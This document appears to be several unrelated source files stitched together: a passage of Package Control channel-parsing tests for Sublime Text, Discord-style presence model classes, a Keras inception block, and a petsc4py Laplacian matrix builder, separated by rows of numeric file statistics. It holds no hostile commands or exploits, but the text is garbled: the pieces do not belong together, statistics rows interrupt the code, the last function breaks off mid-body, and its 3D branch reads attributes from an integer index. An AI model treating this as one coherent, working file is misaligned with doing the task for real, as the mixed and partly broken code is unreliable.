"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1-beta",
"sublime_text": "*",
"platforms": ["windows"]
},
{
"version": "1.0.0",
"date": "2014-11-12 15:14:13",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.0",
"sublime_text": "*",
"platforms": ["*"]
},
{
"version": "0.9.0",
"date": "2014-11-12 02:02:22",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/0.9.0",
"sublime_text": "<3000",
"platforms": ["*"]
}
]
}
},
provider.get_packages(
"https://raw.githubusercontent.com/wbond/package_control-json/master/repository-2.0-explicit.json"
)
)
self.assertEqual(
{
"package_control-tester-2.0-gh": {
"name": "package_control-tester-2.0-gh",
"author": "packagecontrol",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": "https://github.com/packagecontrol-test/package_control-tester/issues",
"donate": None,
"buy": None,
"readme": "https://raw.githubusercontent.com/packagecontrol-test"
"/package_control-tester/master/readme.md",
"previous_names": [],
"labels": [],
"last_modified": "2014-11-12 15:52:35",
"releases": [
{
"version": "1.0.1",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "1.0.1-beta",
"date": "2014-11-12 15:14:23",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1-beta",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "1.0.0",
"date": "2014-11-12 15:14:13",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.0",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "0.9.0",
"date": "2014-11-12 02:02:22",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/0.9.0",
"sublime_text": "<3000",
"platforms": ["*"]
}
]
}
},
provider.get_packages(
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-2.0-github_details.json"
)
)
self.assertEqual(
{
"package_control-tester-2.0-bb": {
"name": "package_control-tester-2.0-bb",
"author": "wbond",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://bitbucket.org/wbond/package_control-tester",
"issues": "https://bitbucket.org/wbond/package_control-tester/issues",
"donate": None,
"buy": None,
"readme": "https://bitbucket.org/wbond/package_control-tester/raw/master/readme.md",
"previous_names": [],
"labels": [],
"last_modified": "2014-11-12 15:52:35",
"releases": [
{
"version": "1.0.1",
"date": "2014-11-12 15:52:35",
"url": "https://bitbucket.org/wbond/package_control-tester/get/1.0.1.zip",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "1.0.1-beta",
"date": "2014-11-12 15:14:23",
"url": "https://bitbucket.org/wbond/package_control-tester/get/1.0.1-beta.zip",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "1.0.0",
"date": "2014-11-12 15:14:13",
"url": "https://bitbucket.org/wbond/package_control-tester/get/1.0.0.zip",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "0.9.0",
"date": "2014-11-12 02:02:22",
"url": "https://bitbucket.org/wbond/package_control-tester/get/0.9.0.zip",
"sublime_text": "<3000",
"platforms": ["*"]
}
]
}
},
provider.get_packages(
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-2.0-bitbucket_details.json"
)
)
def test_get_name_map_300(self):
provider = ChannelProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/channel-3.0.0.json',
self.settings()
)
self.assertEqual(
{},
provider.get_name_map()
)
def test_get_renamed_packages_300(self):
provider = ChannelProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/channel-3.0.0.json',
self.settings()
)
self.assertEqual(
{},
provider.get_renamed_packages()
)
def test_get_repositories_300(self):
provider = ChannelProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/channel-3.0.0.json',
self.settings()
)
self.assertEqual(
[
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-3.0.0-explicit.json",
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-3.0.0-github_releases.json",
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-3.0.0-bitbucket_releases.json"
],
provider.get_repositories()
)
def test_get_sources_300(self):
provider = ChannelProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/channel-3.0.0.json',
self.settings()
)
self.assertEqual(
[
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-3.0.0-explicit.json",
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-3.0.0-github_releases.json",
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-3.0.0-bitbucket_releases.json"
],
provider.get_sources()
)
def test_get_packages_300(self):
self.maxDiff = None
provider = ChannelProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/channel-3.0.0.json',
self.settings()
)
self.assertEqual(
{
"package_control-tester-3.0.0": {
"name": "package_control-tester-3.0.0",
"author": ["packagecontrol", "wbond"],
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": None,
"donate": "https://gratipay.com/wbond/",
"buy": "https://example.com",
"readme": None,
"previous_names": [],
"labels": [],
"last_modified": "2014-11-12 15:52:35",
"releases": [
{
"version": "1.0.1",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1",
"sublime_text": "*",
"platforms": ["windows"],
"dependencies": ["bz2"]
},
{
"version": "1.0.1-beta",
"date": "2014-11-12 15:14:23",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1-beta",
"sublime_text": "*",
"platforms": ["windows"]
},
{
"version": "1.0.0",
"date": "2014-11-12 15:14:13",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.0",
"sublime_text": "*",
"platforms": ["*"]
},
{
"version": "0.9.0",
"date": "2014-11-12 02:02:22",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/0.9.0",
"sublime_text": "<3000",
"platforms": ["*"]
}
]
}
},
provider.get_packages(
"https://raw.githubusercontent.com/wbond/package_control-json/master/repository-3.0.0-explicit.json"
)
)
self.assertEqual(
{
"package_control-tester-3.0.0-gh-tags": {
"name": "package_control-tester-3.0.0-gh-tags",
"author": "packagecontrol",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": "https://github.com/packagecontrol-test/package_control-tester/issues",
"donate": None,
"buy": None,
"readme": "https://raw.githubusercontent.com/packagecontrol-test"
"/package_control-tester/master/readme.md",
"previous_names": [],
"labels": [],
"last_modified": "2014-11-12 15:52:35",
"releases": [
{
"version": "1.0.1",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "1.0.1-beta",
"date": "2014-11-12 15:14:23",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1-beta",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "1.0.0",
"date": "2014-11-12 15:14:13",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.0",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "0.9.0",
"date": "2014-11-12 02:02:22",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/0.9.0",
"sublime_text": "<3000",
"platforms": ["*"]
}
]
},
"package_control-tester-3.0.0-gh-tags_base": {
"name": "package_control-tester-3.0.0-gh-tags_base",
"author": "packagecontrol",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": "https://github.com/packagecontrol-test/package_control-tester/issues",
"donate": None,
"buy": None,
"readme": "https://raw.githubusercontent.com/packagecontrol-test"
"/package_control-tester/master/readme.md",
"previous_names": [],
"labels": [],
"last_modified": "2014-11-12 15:52:35",
"releases": [
{
"version": "1.0.1",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "1.0.1-beta",
"date": "2014-11-12 15:14:23",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1-beta",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "1.0.0",
"date": "2014-11-12 15:14:13",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.0",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "0.9.0",
"date": "2014-11-12 02:02:22",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/0.9.0",
"sublime_text": "<3000",
"platforms": ["*"]
}
]
},
"package_control-tester-3.0.0-gh-tags_prefix": {
"name": "package_control-tester-3.0.0-gh-tags_prefix",
"author": "packagecontrol",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": "https://github.com/packagecontrol-test/package_control-tester/issues",
"donate": None,
"buy": None,
"readme": "https://raw.githubusercontent.com/packagecontrol-test"
"/package_control-tester/master/readme.md",
"previous_names": [],
"labels": [],
"last_modified": "2014-11-28 20:54:15",
"releases": [
{
"version": "1.0.2",
"date": "2014-11-28 20:54:15",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/win-1.0.2",
"sublime_text": "<3000",
"platforms": ["windows"]
}
]
},
"package_control-tester-3.0.0-gh-branch": {
"name": "package_control-tester-3.0.0-gh-branch",
"author": "packagecontrol",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": "https://github.com/packagecontrol-test/package_control-tester/issues",
"donate": None,
"buy": None,
"readme": "https://raw.githubusercontent.com/packagecontrol-test"
"/package_control-tester/master/readme.md",
"previous_names": [],
"labels": [],
"last_modified": "2014-11-28 20:54:15",
"releases": [
{
"version": "2014.11.28.20.54.15",
"date": "2014-11-28 20:54:15",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/master",
"sublime_text": "*",
"platforms": ["*"]
}
]
}
},
provider.get_packages(
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-3.0.0-github_releases.json"
)
)
self.assertEqual(
{
"package_control-tester-3.0.0-bb-tags": {
"name": "package_control-tester-3.0.0-bb-tags",
"author": "wbond",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://bitbucket.org/wbond/package_control-tester",
"issues": "https://bitbucket.org/wbond/package_control-tester/issues",
"donate": None,
"buy": None,
"readme": "https://bitbucket.org/wbond/package_control-tester/raw/master/readme.md",
"previous_names": [],
"labels": [],
"last_modified": "2014-11-12 15:52:35",
"releases": [
{
"version": "1.0.1",
"date": "2014-11-12 15:52:35",
"url": "https://bitbucket.org/wbond/package_control-tester"
"/get/1.0.1.zip",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "1.0.1-beta",
"date": "2014-11-12 15:14:23",
"url": "https://bitbucket.org/wbond/package_control-tester/get/1.0.1-beta.zip",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "1.0.0",
"date": "2014-11-12 15:14:13",
"url": "https://bitbucket.org/wbond/package_control-tester/get/1.0.0.zip",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "0.9.0",
"date": "2014-11-12 02:02:22",
"url": "https://bitbucket.org/wbond/package_control-tester/get/0.9.0.zip",
"sublime_text": "<3000",
"platforms": ["*"]
}
]
},
"package_control-tester-3.0.0-bb-tags_prefix": {
"name": "package_control-tester-3.0.0-bb-tags_prefix",
"author": "wbond",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://bitbucket.org/wbond/package_control-tester",
"issues": "https://bitbucket.org/wbond/package_control-tester/issues",
"donate": None,
"buy": None,
"readme": "https://bitbucket.org/wbond/package_control-tester/raw/master/readme.md",
"previous_names": [],
"labels": [],
"last_modified": "2014-11-28 20:54:15",
"releases": [
{
"version": "1.0.2",
"date": "2014-11-28 20:54:15",
"url": "https://bitbucket.org/wbond/package_control-tester/get/win-1.0.2.zip",
"sublime_text": "<3000",
"platforms": ["windows"]
}
]
},
"package_control-tester-3.0.0-bb-branch": {
"name": "package_control-tester-3.0.0-bb-branch",
"author": "wbond",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://bitbucket.org/wbond/package_control-tester",
"issues": "https://bitbucket.org/wbond/package_control-tester/issues",
"donate": None,
"buy": None,
"readme": "https://bitbucket.org/wbond/package_control-tester/raw/master/readme.md",
"previous_names": [],
"labels": [],
"last_modified": "2014-11-28 20:54:15",
"releases": [
{
"version": "2014.11.28.20.54.15",
"date": "2014-11-28 20:54:15",
"url": "https://bitbucket.org/wbond/package_control-tester/get/master.zip",
"sublime_text": "*",
"platforms": ["*"]
}
]
}
},
provider.get_packages(
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-3.0.0-bitbucket_releases.json"
)
)
def test_get_dependencies_300(self):
self.maxDiff = None
provider = ChannelProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/channel-3.0.0.json',
self.settings()
)
self.assertEqual(
{
'bz2': {
"name": "bz2",
"load_order": "02",
"author": "wbond",
"description": "Python bz2 module",
"issues": "https://github.com/wbond/package_control/issues",
"releases": [
{
"version": "1.0.0",
"url": "https://packagecontrol.io/bz2.sublime-package",
"sublime_text": "*",
"platforms": ["*"]
}
]
},
'ssl-linux': {
"name": "ssl-linux",
"load_order": "01",
"description": "Python _ssl module for Linux",
"author": "wbond",
"issues": "https://github.com/wbond/package_control/issues",
"releases": [
{
"version": "1.0.0",
"url": "http://packagecontrol.io/ssl-linux.sublime-package",
"sublime_text": "*",
"platforms": ["linux"],
"sha256": "d12a2ca2843b3c06a834652e9827a29f88872bb31bd64230775f3dbe12e0ebd4"
}
]
},
'ssl-windows': {
"name": "ssl-windows",
"load_order": "01",
"description": "Python _ssl module for Sublime Text 2 on Windows",
"author": "wbond",
"issues": "https://github.com/wbond/package_control/issues",
"releases": [
{
"version": "1.0.0",
"url": "http://packagecontrol.io/ssl-windows.sublime-package",
"sublime_text": "<3000",
"platforms": ["windows"],
"sha256": "efe25e3bdf2e8f791d86327978aabe093c9597a6ceb8c2fb5438c1d810e02bea"
}
]
}
},
provider.get_dependencies(
"https://raw.githubusercontent.com/wbond/package_control-json/master/repository-3.0.0-explicit.json"
)
)
| 46.682432 | 117 | 0.427809 | 8,079 | 103,635 | 5.371209 | 0.0203 | 0.123888 | 0.124441 | 0.090335 | 0.980965 | 0.978684 | 0.977024 | 0.967484 | 0.959004 | 0.956791 | 0 | 0.051405 | 0.449819 | 103,635 | 2,219 | 118 | 46.70347 | 0.709653 | 0 | 0 | 0.729489 | 0 | 0.025785 | 0.377373 | 0.065084 | 0 | 0 | 0 | 0 | 0.037506 | 1 | 0.032818 | false | 0 | 0.004688 | 0.003282 | 0.047351 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
58b9a7646cac2b5b9ab710cca6b48b5c05877af5 | 729 | py | Python | bunny/api/models/presence.py | senpai-development/SenpaiSlasher | 89842e584b4cd60731ce9c43315c08b02a8dc8e3 | [
"MIT"
] | null | null | null | bunny/api/models/presence.py | senpai-development/SenpaiSlasher | 89842e584b4cd60731ce9c43315c08b02a8dc8e3 | [
"MIT"
] | null | null | null | bunny/api/models/presence.py | senpai-development/SenpaiSlasher | 89842e584b4cd60731ce9c43315c08b02a8dc8e3 | [
"MIT"
] | 1 | 2021-10-31T02:40:03.000Z | 2021-10-31T02:40:03.000Z | from .misc import DictSerializerMixin
class _PresenceParty(DictSerializerMixin):
def __init__(self, **kwargs):
super().__init__(**kwargs)
class _PresenceAssets(DictSerializerMixin):
def __init__(self, **kwargs):
super().__init__(**kwargs)
class _PresenceSecrets(DictSerializerMixin):
def __init__(self, **kwargs):
super().__init__(**kwargs)
class _PresenceButtons(DictSerializerMixin):
def __init__(self, **kwargs):
super().__init__(**kwargs)
class PresenceActivity(DictSerializerMixin):
def __init__(self, **kwargs):
super().__init__(**kwargs)
class PresenceUpdate(DictSerializerMixin):
def __init__(self, **kwargs):
super().__init__(**kwargs)
| 22.78125 | 44 | 0.696845 | 64 | 729 | 7.125 | 0.25 | 0.289474 | 0.342105 | 0.394737 | 0.725877 | 0.725877 | 0.725877 | 0.725877 | 0.614035 | 0 | 0 | 0 | 0.170096 | 729 | 31 | 45 | 23.516129 | 0.753719 | 0 | 0 | 0.631579 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.315789 | false | 0 | 0.052632 | 0 | 0.684211 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
4524eb40ba5544fe387dc9e8e60cbd80ac551bb9 | 3,133 | py | Python | LOBDeepPP/LOBDeepPP_model/__inception.py | mariussterling/LOBDeepPP_code | 010782f8db9a745940753f49d953361c32ee1190 | [
"MIT"
] | 1 | 2021-07-09T08:40:58.000Z | 2021-07-09T08:40:58.000Z | LOBDeepPP/LOBDeepPP_model/__inception.py | mariussterling/LOBDeepPP_code | 010782f8db9a745940753f49d953361c32ee1190 | [
"MIT"
] | null | null | null | LOBDeepPP/LOBDeepPP_model/__inception.py | mariussterling/LOBDeepPP_code | 010782f8db9a745940753f49d953361c32ee1190 | [
"MIT"
] | null | null | null | from keras import layers
def inception(inp, filters, name, bias_constraint=None):
out1 = layers.Conv1D(
filters=filters,
kernel_size=1,
padding='same',
bias_constraint=bias_constraint,
activation='relu', # 'relu',
name=name + '_conv3_1')(inp)
out1 = layers.Conv1D(
filters=filters,
kernel_size=3,
padding='same',
bias_constraint=bias_constraint,
activation='relu', # 'relu',
name=name + '_conv3')(out1)
out2 = layers.Conv1D(
filters=filters,
kernel_size=1,
padding='same',
bias_constraint=bias_constraint,
activation='relu', # 'relu',
name=name + '_conv5_1')(inp)
out2 = layers.Conv1D(
filters=filters,
kernel_size=5,
padding='same',
bias_constraint=bias_constraint,
activation='relu', # 'relu',
name=name + '_conv5')(out2)
out3 = layers.MaxPool1D(
pool_size=3,
strides=1,
padding='same',
name=name + '_mxpool3')(inp)
out3 = layers.Conv1D(
filters=filters,
kernel_size=1,
padding='same',
bias_constraint=bias_constraint,
activation='relu', # 'relu',
name=name + '_mxpool3_1')(out3)
out4 = layers.Conv1D(
filters=filters,
kernel_size=1,
padding='same',
bias_constraint=bias_constraint,
activation='relu', # 'relu',
name=name + '_skip')(inp)
out = layers.Concatenate(axis=2, name=name + '_concatenate')([
out1, out2, out3, out4])
return out
def inception2D(inp, filters, name, bias_constraint=None):
out1 = layers.Conv2D(
filters=filters,
kernel_size=1,
padding='same',
bias_constraint=bias_constraint,
activation='relu',
name=name + '_conv3_1')(inp)
out1 = layers.Conv2D(
filters=filters,
kernel_size=3,
padding='same',
bias_constraint=bias_constraint,
activation='relu',
name=name + '_conv3')(out1)
out2 = layers.Conv2D(
filters=filters,
kernel_size=1,
padding='same',
bias_constraint=bias_constraint,
activation='relu',
name=name + '_conv5_1')(inp)
out2 = layers.Conv2D(
filters=filters,
kernel_size=5,
padding='same',
bias_constraint=bias_constraint,
activation='relu',
name=name + '_conv5')(out2)
out3 = layers.MaxPool2D(
pool_size=3,
strides=1,
padding='same',
name=name + '_mxpool3')(inp)
out3 = layers.Conv2D(
filters=filters,
kernel_size=1,
padding='same',
bias_constraint=bias_constraint,
activation='relu',
name=name + '_mxpool3_1')(out3)
out4 = layers.Conv2D(
filters=filters,
kernel_size=1,
padding='same',
bias_constraint=bias_constraint,
activation='relu',
name=name + '_skip')(inp)
out = layers.Concatenate(axis=3, name=name + '_concatenate')([
out1, out2, out3, out4])
return out
| 29.009259 | 66 | 0.57421 | 328 | 3,133 | 5.295732 | 0.125 | 0.209557 | 0.138169 | 0.165803 | 0.961428 | 0.961428 | 0.961428 | 0.92228 | 0.830167 | 0.743811 | 0 | 0.035991 | 0.299394 | 3,133 | 107 | 67 | 29.280374 | 0.755353 | 0.015002 | 0 | 0.893204 | 0 | 0 | 0.0747 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.019417 | false | 0 | 0.009709 | 0 | 0.048544 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
189cc7e5f72d8b247ae12c94308e5401c32d7b8c | 67,747 | py | Python | mrpy/spatial_operators/ctr_poly/2nd_order_ctr_finite_diff/laplacian-bis.py | marc-nguessan/mrpy | 6fb0bce485234a45bb863f71bc2bdf0a22014de3 | [
"BSD-3-Clause"
] | 2 | 2020-01-06T10:48:44.000Z | 2020-01-09T20:07:08.000Z | mrpy/spatial_operators/ctr_poly/2nd_order_ctr_finite_diff/laplacian-bis.py | marc-nguessan/mrpy | 6fb0bce485234a45bb863f71bc2bdf0a22014de3 | [
"BSD-3-Clause"
] | 1 | 2020-01-09T20:08:50.000Z | 2020-01-09T20:11:20.000Z | mrpy/spatial_operators/ctr_poly/2nd_order_ctr_finite_diff/laplacian-bis.py | marc-nguessan/mrpy | 6fb0bce485234a45bb863f71bc2bdf0a22014de3 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import print_function, division
#!!!!!!!!!!! DEPRECATED. SHOULD BE SUPRESSED !!!!!!!!!!!!!
"""This module is used to compute the laplacian operator in the x-direction.
The procedure "create_matrix" returns the matrix representing the linear
combination of this operation on a cartesian grid representation of a variable.
Since the spatial operator depends on the specific boundary conditions applied
to the computed variable, this matrix depends on the boundary conditions.
The procedure "create_bc_scalar" returns an array of the values needed to
complete the computation of the spatial operation on the meshes located at the boundary
of the domain. We assume that the type and the values of the variable at the
boundray do not change with time, so that this array is built with the type of
boundary condition applied to the varialbe computed, and the values at the
north, south, east and west boundaries of the variable.
...
...
"""
import petsc4py.PETSc as petsc
from six.moves import range
import config as cfg
from mrpy.mr_utils import mesh
from mrpy.mr_utils import op
import numpy as np
import math
import importlib
from .matrix_aux import matrix_add
#!!!!!!! penser a rajouter un mr_bc_scalar !!!!!!!!
def create_matrix(tree, axis):
matrix = petsc.Mat().create()
number_of_rows = tree.number_of_leaves
size_row = (number_of_rows, number_of_rows)
size_col = (number_of_rows, number_of_rows)
matrix.setSizes((size_row, size_col))
matrix.setUp()
boundary_conditions = tree.bc[0]
# matrix = np.zeros(shape=(number_of_rows, number_of_rows), dtype=np.float)
if tree.dimension == 2:
for row in range(number_of_rows):
index = tree.tree_leaves[row]
i = tree.nindex_x[index]
j = tree.nindex_y[index]
k = tree.nindex_z[index]
level = tree.nlevel[index]
dx = tree.ndx[index]
dy = tree.ndy[index]
dz = tree.ndz[index]
# left flux for axis 0
if mesh.bc_compatible_local_indexes(tree, level, i-1, j, k) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree, level, i-1, j, k)
index_left = mesh.z_curve_index(tree.dimension, level, i_left, j_left, k_left)
if index_left in tree.tree_nodes and tree.nisleaf[index_left] \
or index_left not in tree.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree, matrix, row, -(dy)/(dx), level, i, j, k)
matrix_add(tree, matrix, row, (dy)/(dx), level, i_left, j_left, k_left)
else:
for n in range(2):
matrix_add(tree, matrix, row, -(dy/2.)/((dx/2.)), level+1, 2*i, 2*j+n, 2*k)
matrix_add(tree, matrix, row, (dy/2.)/((dx/2.)), level+1, 2*i_left+1, 2*j+n, 2*k)
elif boundary_conditions == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree, matrix, row, -2*(dy)/(dx), level, i, j, k)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# right flux for axis 0
if mesh.bc_compatible_local_indexes(tree, level, i+1, j, k) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree, level, i+1, j, k)
index_right = mesh.z_curve_index(tree.dimension, level, i_right, j_right, k_right)
if index_right in tree.tree_nodes and tree.nisleaf[index_right] \
or index_right not in tree.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree, matrix, row, -dy/(dx), level, i, j, k)
matrix_add(tree, matrix, row, dy/(dx), level, i_right, j_right, k_right)
else:
for n in range(2):
matrix_add(tree, matrix, row, -(dy/2.)/((dx/2.)), level+1, 2*i+1, 2*j+n, 2*k)
matrix_add(tree, matrix, row, (dy/2.)/((dx/2.)), level+1, 2*i_right, 2*j+n, 2*k)
elif boundary_conditions == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree, matrix, row, -2*(dy)/(dx), level, i, j, k)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# left flux for axis 1
if mesh.bc_compatible_local_indexes(tree, level, i, j-1, k) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree, level, i, j-1, k)
index_left = mesh.z_curve_index(tree.dimension, level, i_left, j_left, k_left)
if index_left in tree.tree_nodes and tree.nisleaf[index_left] \
or index_left not in tree.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree, matrix, row, -(dx)/(dy), level, i, j, k)
matrix_add(tree, matrix, row, (dx)/(dy), level, i_left, j_left, k_left)
else:
for m in range(2):
matrix_add(tree, matrix, row, -(dx/2.)/((dy/2.)), level+1, 2*i+m, 2*j, 2*k)
matrix_add(tree, matrix, row, (dx/2.)/((dy/2.)), level+1, 2*i+m, 2*j_left+1, 2*k)
elif boundary_conditions == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree, matrix, row, -2*(dx)/(dy), level, i, j, k)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# right flux for axis 1
if mesh.bc_compatible_local_indexes(tree, level, i, j+1, k) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree, level, i, j+1, k)
index_right = mesh.z_curve_index(tree.dimension, level, i_right, j_right, k_right)
if index_right in tree.tree_nodes and tree.nisleaf[index_right] \
or index_right not in tree.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree, matrix, row, -dx/(dy), level, i, j, k)
matrix_add(tree, matrix, row, dx/(dy), level, i_right, j_right, k_right)
else:
for m in range(2):
matrix_add(tree, matrix, row, -(dx/2.)/((dy/2.)), level+1, 2*i+m, 2*j+1, 2*k)
matrix_add(tree, matrix, row, (dx/2.)/((dy/2.)), level+1, 2*i+m, 2*j_right, 2*k)
elif boundary_conditions == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree, matrix, row, -2*(dx)/(dy), level, i, j, k)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
matrix.assemble()
return matrix
if tree.dimension == 3:
for row in range(number_of_rows):
index = tree.tree_leaves[row]
i = tree.nindex_x[index]
j = tree.nindex_y[index]
k = tree.nindex_z[index]
level = tree.nlevel[index]
dx = tree.ndx[index]
dy = tree.ndy[index]
dz = tree.ndz[index]
node = tree.tree_leaves[row]
i = node.index_x
j = node.index_y
k = node.index_z
# left flux for axis 0
if mesh.bc_compatible_local_indexes(tree, level, i-1, j, k) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree, level, i-1, j, k)
index_left = mesh.z_curve_index(tree.dimension, level, i_left, j_left, k_left)
if index_left in tree.tree_nodes and tree.nisleaf[index_left] \
or index_left not in tree.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree, matrix, row, -(dy*dz)/(dx), level, i, j, k)
matrix_add(tree, matrix, row, (dy*dz)/(dx), level, i_left, j_left, k_left)
else:
for o in range(2):
for n in range(2):
matrix_add(tree, matrix, row, -((dy/2.)*(dz/2.))/((dx/2)), level+1, 2*i, 2*j+n, 2*k+o)
matrix_add(tree, matrix, row, ((dy/2.)*(dz/2.))/((dx/2)), level+1, 2*i_left+1, 2*j+n, 2*k+o)
elif boundary_conditions == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree, matrix, row, -2*(dy*dz)/(dx), level, i, j, k)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# right flux for axis 0
if mesh.bc_compatible_local_indexes(tree, level, i+1, j, k) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree, level, i+1, j, k)
index_right = mesh.z_curve_index(tree.dimension, level, i_right, j_right, k_right)
if index_right in tree.tree_nodes and tree.nisleaf[index_right] \
or index_right not in tree.tree_nodes:
# the finest level for the right flux is the node's level
